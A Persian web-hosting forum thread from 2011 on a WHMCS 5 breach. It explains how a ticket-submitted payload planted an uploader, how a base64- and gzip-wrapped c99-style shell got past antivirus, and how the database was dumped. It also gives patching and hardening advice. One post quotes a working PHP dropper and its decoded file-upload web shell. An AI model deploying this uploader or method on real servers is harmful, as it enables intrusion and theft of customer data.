-
December 11th, 2011, 00:03
#151
پاسخ : هک شدن از طریق whmcs5
خدمت دوستان عزیز عرض کنم
روش این هک به این صورته
کد وقتی در تیکت ارسال میشه
فایل آپلودر در پوشه دانلود ایجاد میشه
b0x.php
سپس هکر با یک اسکریپت شل به راحتی میتونه دسترسی به فایل
مثل c99shell
معروف
configuration
و سپس خوندن مشخصات کامل دیتابیستون کنه
فایل شل هم بصورت
base64
آپلود کردن دهن سرویس ها
چون آنتی ویروس های سرور به سرعت شناساییش میکنن
حتی برای محکم کاری ظاهراً هر فایلی آپلود میشه آنتی ویروس سی پنل چک میکنه
اینا با یه روش نابغه گرانه
فایل رو بصورت
gzip
شده آپلود کردن و بعد از حالت کمپرس خارج کردن
سپس با همون شل میره وصل میشه به دیتابیس مربوطه و همه چیو دامپ و دانلود میکنه
patchi
هم که داده شده میاد این راه رو از طریق اصلاح فایل
functions
میبنده
جالبه بدونین
این گروهی که این هک رو داده
از اکسپلویت اخیر
Local File Disclosure
استفاده کاملتری کرده
و این مورد رو داده بیرون
با اینکه خودم طعمه این هک شدم و احساس بسیار بدی دارم که تمام تلاشام بی هوده بوده و از بین خواهد رفت
اما کارشون رو در نوشتن و اجرای این هک فوق العاده تحسین میکنم!
ضمناً اینم در نظر داشته باشید
تغییر و کم کردن سایز
text
در
submitticket
بی فایده هست و راه دور زدنش بسیار راحته!
(کاری که یکی از دوستان پیشنهاد داده بود)
الان میفهمم رعایت خیلی از نکات امنیتی
نه تنها بیمورد نیست
بلکه شرط کافی نیز نیست!
از جمله نصب این سیستم روی یک سرور جدا
استفاده نکردن از هاستینگ اشتراکی
نصب نداشتن سیستم های
cms
دیگر
استفاده نکردن از سیستم نال
و استفاده از لایسنس اصل
اصول حفاظت از اطلاعات مهم یک سایت هست
این مورد تجربه ای خواهد شد برای من و همه دوستان
گرچه ما ایرانیارو جون به جونمون کنن کار خودمونو میکنیم
فقط امیدوارم استفاده نا صحیح از اطلاعات دیتابیس من و خیلی دیگر از دوستان نشه
خیلی ناراحت کنندست اما به هر حال اتفاقیه که افتاده
ازین به بعد مراقب باشید
از قدیم گفتن اول امنیت خودتو رعایت کن
بعد خر د ز د رو بچسبین
مایی که درمون رو قفل نزدیم
اینقدر دنبال اینکه کی مارو هک کرده نباشیم و این حرفای حاشیه ای
این جوجه هکر این کارو نمیکرد یکی دیگه میکرد
حالا سایت های خارجی رو ببینید
با این همه اطلاعات کارت های اعتباری ذخیره شده و لو رفته
ما که هیچی!
فقط یادتون باشه
اگر یکبار هک شده باشید
ممکنه هکر توی هر پوشه ای به هر اسمی یه شل گذاشته باشه!
پس بسیار مراقب باشید
همچنین منتظر فروش دیتابیس های سایت های بیچاره در روزهای آتی باشید
چه لذت و منفعتی برای اونا و چه بیچارگی برای ما خواهد داشت...
و در آخر پیشنهاد میکنم دستپاچه نشین قبل از هر کاری یه بک آپ از کل سیستم و فایلاتون بگیرین که اگه یه عوضی زد همشو پاک کرد وضع ازین بدتر نشه!
همینطور اگر چند سیستم WHMCS دارین همشونو آپدیت کنید
با آپدیت جدید میگه hacking attempt! و مشکل حل میشه!
و سخن آخر با کسایی که اینکارو کردن یا میخوان بکنن
فکر نکنید با تغییر آی پی هر کاری خواستین میکنید
مطمئن باشید کسانی توی این فروم هستن که به راحتی پیداتون میکنن
و اونوقت دیگه کار از کار گذشته
مطمئن باشید کسایی که هک شدن بی کار نخواهند نشست
امیدوارم مطالب عنوان شده برای دوستان مفید واقع شده باشه
ویرایش توسط dm800pvr : December 11th, 2011 در ساعت 00:09
-
-
December 11th, 2011 00:03
# ADS
-
December 11th, 2011, 14:34
#152
پاسخ : هک شدن از طریق whmcs5
نوشته اصلی توسط
dm800pvr
خدمت دوستان عزیز عرض کنم
روش این هک به این صورته
کد وقتی در تیکت ارسال میشه....
سلام تیبل های دیتا بیس را هم اموزش میدادید که ملت کارشون برای هک و ***ی اطلاعات کاربران را حت تر باشه 
این تاپیک لعنتی نقش مهمی تویه این هک ها داشت و اینا یک مشت جوجه هکرند وگرنه اصلا نیازی به اپلود شل نیست راه های راحت تری هم هست
-
-
December 13th, 2011, 18:03
#153
عضو انجمن
پاسخ : هک شدن از طریق whmcs5
سلام
دوستان حتما Patch امنیتی را اعمال کنند
من چند وقت پیش از طرف یک از تیم های هک ایرانی سایتم هک شد
که تمام اطلاعات سایت را حذف و مجدد آپلود کردم و patch را نصب کردم وتمام موارد امنیتی هم رعایت کردم تا حالا هم هیچ مشکلی نداشتم
با رعایت موارد امنیتی می توانید جلو هک را بگیرید
تایپیک مفید
آموزش رفع مشکل امنیتی whmcs
در ضمن ایمیل و هم چنین ip هکر را در این تایپیک اعلام کنید
-
-
December 13th, 2011, 18:50
#154
عضو انجمن
پاسخ : هک شدن از طریق whmcs5
آی پی من کسی که به من حمله کرد
188.50.52.64
---------- Post added at 06:50 PM ---------- Previous post was at 06:41 PM ----------
نوشته اصلی توسط
maryam1
بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟
یه بار دیکد می شه این
کد PHP:
$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("kir.php","w");
fwrite($fo,$code);
توی این یه کد شده هست که دیکدش می شه
کد PHP:
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
-
-
December 13th, 2011, 19:08
#155
پاسخ : هک شدن از طریق whmcs5
تاپیک قفل شد
فکر کنم همه فهمیدن ، دیگه نیازی به ادامه نیست
-
